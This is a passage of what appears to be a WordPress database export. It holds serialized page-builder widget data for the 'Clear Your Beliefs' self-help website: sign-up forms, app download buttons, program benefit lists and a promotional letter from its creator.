Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1373, 1809, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1369:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1827:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1177:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1372, 1818, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1369:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1827:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1177:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1164, 1648, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;"><div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:785:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1418:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2894:"<div id="divStroke"><h2 style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" data-wp-imgselect="1" />A Note from Lion Goodman</strong></h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.  </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the 